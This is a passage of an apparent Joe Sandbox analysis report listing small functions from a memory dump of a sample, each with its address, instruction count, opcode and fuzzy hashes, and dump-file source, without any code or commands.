                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                            • Instruction ID: 44ef326954c3b5b063969b37a0762fb391d553a6c1093b8489d1ba9214be50d3
                                                            • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                            • Instruction Fuzzy Hash: B7D0C975612E80CFC72BCB0DC5A8B1633E4FB45B44F8104A0E401CBB21DA2CED40DA00
                                                            Function 00FCC700 Relevance: .0, Instructions: 12COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                            • Instruction ID: 37afb8d523f7f49f51868aaee38373c18913503af33e54f9c0289d9090693c63
                                                            • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                            • Instruction Fuzzy Hash: D8C01232150644AFC7119A94DD01F0177A9E798B50F000021F20447571C535E910E644
                                                            Function 00FB0310 Relevance: .0, Instructions: 11COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                            • Instruction ID: ae91bcdd82f8197a3b8db9cd9cc6746ec123cc3404f7773a13a46f401a897f6a
                                                            • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                            • Instruction Fuzzy Hash: FFD01236100248EFCB01DF41C890D9A776AFBC8710F148019FD19076118A35ED62DA50
                                                            Function 00F90750 Relevance: .0, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                            • Instruction ID: 8e9f1ced509e3cf558fea1542ccfca00ba49166f1563eb08de6dc0d179db40aa
                                                            • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                            • Instruction Fuzzy Hash: E1C04C75701945CFCF15DB5AD694F4577E4F744750F151890F805CB721E624ED01DA10
                                                            Function 00FD4340 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f02879eb7f20e62d41e3221169fbe7591d8d3c78f89e05550845dfc9ed88ad9c
                                                            • Instruction ID: 9b8f8649a3db924f6b8d3ea17e09199096c636a71b4df2729d96d07ab8dbebb9
                                                            • Opcode Fuzzy Hash: f02879eb7f20e62d41e3221169fbe7591d8d3c78f89e05550845dfc9ed88ad9c
                                                            • Instruction Fuzzy Hash: 0490023160584022924071598884546400597E0741B55C032E0464554D8E188A576362
                                                            Function 00FD4650 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b79cf2e8c67091789045449dcc79dfba580512306b16d98e1916bf6f38820354
                                                            • Instruction ID: 2e869024869be6651f0c5aa90a39611d7b687dd3eaa1c7a06fa7a2c76f18c9d3
                                                            • Opcode Fuzzy Hash: b79cf2e8c67091789045449dcc79dfba580512306b16d98e1916bf6f38820354
                                                            • Instruction Fuzzy Hash: 8A90026160154052424071598804406600597E1741395C136A0594560D8A1C8956A26A
                                                            Function 00FD2AF0 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0466bcf5ec34a50f3aec0a6fcddd9412a6f3597b68f9063fecbe376a2735fd4b
                                                            • Instruction ID: 3aac0b813b11e9335df943a3c7845d54eed0d5302ecf3b74d04b93c389f5eaff
                                                            • Opcode Fuzzy Hash: 0466bcf5ec34a50f3aec0a6fcddd9412a6f3597b68f9063fecbe376a2735fd4b
                                                            • Instruction Fuzzy Hash: B7900225221440120245B559460450B044597D6791395C036F1456590DCA2589666322
                                                            Function 00FD2AD0 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a7c9fd42663995ae8f3cd965fded772f70b92529857d66859b18a9c182e96afc
                                                            • Instruction ID: 456460613b3bb2aedfd12231fea61ee1a29ff800338cc53094ef2e6fbb1af41e
                                                            • Opcode Fuzzy Hash: a7c9fd42663995ae8f3cd965fded772f70b92529857d66859b18a9c182e96afc
                                                            • Instruction Fuzzy Hash: 8A900225211440130205B5594704507004687D5791355C032F1055550DDA2589626122
                                                            Function 00FD2AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b37748fc2d25be767af859454fda267c2b49b62885a9120fd1b895218cd1c7c1
                                                            • Instruction ID: 9069de3baa7e0918593b6bc3f984b8464d188f7ae3a8f9b2908832aa60ad4d7f
                                                            • Opcode Fuzzy Hash: b37748fc2d25be767af859454fda267c2b49b62885a9120fd1b895218cd1c7c1
                                                            • Instruction Fuzzy Hash: CA9002A1201580A24600B259C404B0A450587E0741B55C037E1094560DC9298952A136
                                                            Function 00FD2BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 92c76c4fa1fc6a723bbc9b0e21d11f8ac5f71afacde5d8bc598807dd78ef6a6c
                                                            • Instruction ID: 558d7888f6ce653b1db4aa3c103b50a8211f5291edf7d27b2d811d654404782a
                                                            • Opcode Fuzzy Hash: 92c76c4fa1fc6a723bbc9b0e21d11f8ac5f71afacde5d8bc598807dd78ef6a6c
                                                            • Instruction Fuzzy Hash: 3290023120144812D2807159840464A000587D1741F95C036A0065654ECE198B5A77A2
                                                            Function 00FD2BE0 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 856bbc668a3ae9890000a45c4e26d144a6646eca13872a9eb9be438c0e89c7fb
                                                            • Instruction ID: 5b842cc35490e138e269170c5dda022b12574e525a6651000272496b3e3fa317
                                                            • Opcode Fuzzy Hash: 856bbc668a3ae9890000a45c4e26d144a6646eca13872a9eb9be438c0e89c7fb
                                                            • Instruction Fuzzy Hash: 1690023120548852D24071598404A46001587D0745F55C032A00A4694E9A298E56B662
                                                            Function 00FD2BA0 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3a88986dc3401ebcb7ff036102836ca27f8aee1476dc4b728d065f95187dc022
                                                            • Instruction ID: 27b9abf654a7a3e8051706e65f73f5e45711344968435e397e37f05b40f08ae8
                                                            • Opcode Fuzzy Hash: 3a88986dc3401ebcb7ff036102836ca27f8aee1476dc4b728d065f95187dc022
                                                            • Instruction Fuzzy Hash: 1B90023160544812D25071598414746000587D0741F55C032A0064654E8B598B5676A2
                                                            Function 00FD2B80 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3859e9264c707cd231e455bec487ec57c9c1946f23be3d4d198bcbc09d3a2b4d
                                                            • Instruction ID: 690853fd128e58842ec5f2173d7fa4574593483f22d7d58272b920b7d2321deb
                                                            • Opcode Fuzzy Hash: 3859e9264c707cd231e455bec487ec57c9c1946f23be3d4d198bcbc09d3a2b4d
                                                            • Instruction Fuzzy Hash: EE90023120144812D20471598804686000587D0741F55C032A6064655F9A6989927132
                                                            Function 00FD2CF0 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bae6b31a5a166761f9d1cb9aff04472b5d22badcb041f82cb35130372287af7d
                                                            • Instruction ID: 413b2c9220d8dd908588744d6d0ab36e93ccf21d3369a0b833e277ee768c6d41
                                                            • Opcode Fuzzy Hash: bae6b31a5a166761f9d1cb9aff04472b5d22badcb041f82cb35130372287af7d
                                                            • Instruction Fuzzy Hash: D390023120144413D20071599508707000587D0741F55D432A0464558EDA5A89527122
                                                            Function 00FD2CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 76be3217032d800c35bd04c41fd73477213e51b1b5943dc4a279adf0ddc716d6
                                                            • Instruction ID: 0adf97cfe5139668185e9b5ef196f73133374d8aa91444f83cba7918d2595608
                                                            • Opcode Fuzzy Hash: 76be3217032d800c35bd04c41fd73477213e51b1b5943dc4a279adf0ddc716d6
                                                            • Instruction Fuzzy Hash: 6690022160544412D24071599418706001587D0741F55D032A0064554ECA5D8B5676A2
                                                            Function 00FD2CA0 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f44fb1329c7877886e500933c20b12853f12072d9ab184ffe2fbdb8df1c3eff7
                                                            • Instruction ID: 38ce048f38b0f5254e61dec5a95b58ce687f905a850cc1e502675042fe04a264
                                                            • Opcode Fuzzy Hash: f44fb1329c7877886e500933c20b12853f12072d9ab184ffe2fbdb8df1c3eff7
                                                            • Instruction Fuzzy Hash: 9590023120144412D20075999408646000587E0741F55D032A5064555FCA6989927132
                                                            Function 00FD2C60 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c7a8c8797cccdebe976e07654223b9c6843d4bf5bdf134213707e221d80d12f3
                                                            • Instruction ID: 5897352a92f0e7c6f79b2ffe3e31375f373460b6960966d43f3b15144678d777
                                                            • Opcode Fuzzy Hash: c7a8c8797cccdebe976e07654223b9c6843d4bf5bdf134213707e221d80d12f3
                                                            • Instruction Fuzzy Hash: FE90023120144852D20071598404B46000587E0741F55C037A0164654E8A19C9527522
                                                            Function 00FD2DD0 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fc3659631aa76e14429511486fb786d766399ab0b4b163bd6f0d861ea7da864c
                                                            • Instruction ID: c9982db9a5eebe5b990e5b013eeee3af01d8622b502fae3de11ed9f91dbce211
                                                            • Opcode Fuzzy Hash: fc3659631aa76e14429511486fb786d766399ab0b4b163bd6f0d861ea7da864c
                                                            • Instruction Fuzzy Hash: 3D900221242481625645B1598404507400697E0781795C033A1454950D892A9957E622
                                                            Function 00FD2DB0 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bc8682bdaa50befcc3ab4dae458c78af7818b3ca40ca90c6c1780a2b741d5200
                                                            • Instruction ID: 00fc34e1f140cdde1df6281460393166cd92cd277c250a5f018c42dee829b103
                                                            • Opcode Fuzzy Hash: bc8682bdaa50befcc3ab4dae458c78af7818b3ca40ca90c6c1780a2b741d5200
                                                            • Instruction Fuzzy Hash: 0390023124144412D24171598404606000997D0781F95C033A0464554F8A598B57BA62
                                                            Function 00FD2D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e89ab20348f78b14fedb2339d193d7c080b0bb98f3edd9d91ef90bcbf93adc50
                                                            • Instruction ID: fd36c4e91f639fe2b9f5bf7c9967b4f8888b7750394cfb84da30d60e2e3a616d
                                                            • Opcode Fuzzy Hash: e89ab20348f78b14fedb2339d193d7c080b0bb98f3edd9d91ef90bcbf93adc50
                                                            • Instruction Fuzzy Hash: 9190022130144013D240715994186064005D7E1741F55D032E0454554DDD1989576223
                                                            Function 00FD2D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 40048222f4250ce1efd1f4c24ae3feb2d89a2580b2ff0511ff3eb4dc47548a67
                                                            • Instruction ID: e8b00b20b8794699c41f5b52b2ce6bef3919bd738209f1515ffd56427f238fe3
                                                            • Opcode Fuzzy Hash: 40048222f4250ce1efd1f4c24ae3feb2d89a2580b2ff0511ff3eb4dc47548a67
                                                            • Instruction Fuzzy Hash: 9A90022921344012D2807159940860A000587D1742F95D436A0055558DCD19896A6322
                                                            Function 00FD2D00 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7316a63cbff6afdc3ddc7d245bca9dc8554e37474e204a9e561a684320c505cb
                                                            • Instruction ID: e507dbd778da18261279149e4db5432f321b04bf526457799f22c083258455ba
                                                            • Opcode Fuzzy Hash: 7316a63cbff6afdc3ddc7d245bca9dc8554e37474e204a9e561a684320c505cb
                                                            • Instruction Fuzzy Hash: 4C90022120548452D20075599408A06000587D0745F55D032A10A4595ECA398952B132
                                                            Function 00FD2EE0 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 914e5b7a333538a52bb08dff42589d3cd118b2d0f221a4c8abd0da68a88f3b3d
                                                            • Instruction ID: a116a41a511060a517074c98469894a2202ceefdf524e807bab46d252d48d5b3
                                                            • Opcode Fuzzy Hash: 914e5b7a333538a52bb08dff42589d3cd118b2d0f221a4c8abd0da68a88f3b3d
                                                            • Instruction Fuzzy Hash: 4E90026120184413D24075598804607000587D0742F55C032A20A4555F8E2D8D527136
                                                            Function 00FD2EA0 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 83556623b239429a598748a5a50a8aeb3a27cbe155c0f9c91f9a23452834224f
                                                            • Instruction ID: c4b487590700dc1c4ac6f6ec7bf1fe8e8b0443fbdcae13f08793490d9acb3927
                                                            • Opcode Fuzzy Hash: 83556623b239429a598748a5a50a8aeb3a27cbe155c0f9c91f9a23452834224f
                                                            • Instruction Fuzzy Hash: 5090027120144412D24071598404746000587D0741F55C032A50A4554F8A5D8ED67666
                                                            Function 00FD2E80 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5d5980f808370f6d9f3854a5044bf50767db468271c18f6d1acd9e80b0b3537b
                                                            • Instruction ID: 9839342db0711ae3d2337db593d0c2bc797cb695b77992694761594098713c97
                                                            • Opcode Fuzzy Hash: 5d5980f808370f6d9f3854a5044bf50767db468271c18f6d1acd9e80b0b3537b
                                                            • Instruction Fuzzy Hash: 0890022160144512D20171598404616000A87D0781F95C033A1064555FCE298A93B132
                                                            Function 00FD2E30 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6405716764a75bfc4f2963634262a41d0715daa21caf07517069f8e87abac96b
                                                            • Instruction ID: a68e3e6c6f3ce08d4947ada9d385ccd3acbe46862c9afbd659b2d0011cd93607
                                                            • Opcode Fuzzy Hash: 6405716764a75bfc4f2963634262a41d0715daa21caf07517069f8e87abac96b
                                                            • Instruction Fuzzy Hash: C690022130144412D202715984146060009C7D1785F95C033E1464555E8A298A53B133
                                                            Function 00FD2FE0 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ca3325fb8d8becbafddecef820879e0b258a51b21988583c4730d36462621490
                                                            • Instruction ID: 10bf07be44dda5e8d3541f22782f88bfce8c76212549297e58aca9c72c9f889a
                                                            • Opcode Fuzzy Hash: ca3325fb8d8becbafddecef820879e0b258a51b21988583c4730d36462621490
                                                            • Instruction Fuzzy Hash: 6F900221211C4052D30075698C14B07000587D0743F55C136A0194554DCD1989626522
                                                            Function 00FD2FB0 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c09f45751c7d32fb230b149c1aca73d1785f1760d42edf40151cc1948601a621
                                                            • Instruction ID: 826fa0047d750c5fd875652a117d6b05f62e7e1d071518e3e3faecd4d23e74fc
                                                            • Opcode Fuzzy Hash: c09f45751c7d32fb230b149c1aca73d1785f1760d42edf40151cc1948601a621
                                                            • Instruction Fuzzy Hash: 019002216014405242407169C8449064005ABE1751755C132A09D8550E895D89666666
                                                            Function 00FD2FA0 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e0d5ca8d0e9c77e7ede080c2e45795441010e32ab4e024d49b4153a8c591623d
                                                            • Instruction ID: 18a94a0d51072b004df766bfceb419d4a87f37cd9adbfe89016d99207a9c840e
                                                            • Opcode Fuzzy Hash: e0d5ca8d0e9c77e7ede080c2e45795441010e32ab4e024d49b4153a8c591623d
                                                            • Instruction Fuzzy Hash: 8390023120184412D20071598808747000587D0742F55C032A51A4555F8A69C9927532
                                                            Function 00FD2F90 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 712b7a4cc21204b0d4cbff6977719564735d0619eeab6afac3da530faad4851c
                                                            • Instruction ID: f8d06ad7b3e6c62b3653a83ece14d06643fa7b14627e8a5424e5e2f2847c4607
                                                            • Opcode Fuzzy Hash: 712b7a4cc21204b0d4cbff6977719564735d0619eeab6afac3da530faad4851c
                                                            • Instruction Fuzzy Hash: 9790023120184412D2007159881470B000587D0742F55C032A11A4555E8A2989527572
                                                            Function 00FD2F60 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ad3ffd366faa1a35fb7f5767a2a1757b7db772c594069d747d96aa3d4fb23ee7
                                                            • Instruction ID: b518d914a01e14d49201ae1e12ab681362f43198cf5739b6277bb01fdd409b89
                                                            • Opcode Fuzzy Hash: ad3ffd366faa1a35fb7f5767a2a1757b7db772c594069d747d96aa3d4fb23ee7
                                                            • Instruction Fuzzy Hash: B390026121144052D20471598404706004587E1741F55C033A2194554DC92D8D626126
                                                            Function 00FD2F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bb1aba4201b97c64a5353d00da11c6f30bf0d8713178225c29767777e632065f
                                                            • Instruction ID: 4a401b40222a8cb397117b08120839f5f28f2fb68f1ad3624ddc69a9aa8817dc
                                                            • Opcode Fuzzy Hash: bb1aba4201b97c64a5353d00da11c6f30bf0d8713178225c29767777e632065f
                                                            • Instruction Fuzzy Hash: 9A90026134144452D20071598414B060005C7E1741F55C036E10A4554E8A1DCD537127
                                                            Function 00FD3090 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 33db5965f78bfe2e3492687791ac11e62960f2572c1f138c4a16729775068574
                                                            • Instruction ID: 3cf55d9ddbd939e2a3e050330a727fab40515a1ca1d5972562633bb2b1834674
                                                            • Opcode Fuzzy Hash: 33db5965f78bfe2e3492687791ac11e62960f2572c1f138c4a16729775068574
                                                            • Instruction Fuzzy Hash: FE90022124144812D2407159C4147070006C7D0B41F55C032A0064554E8A1A8A6676B2
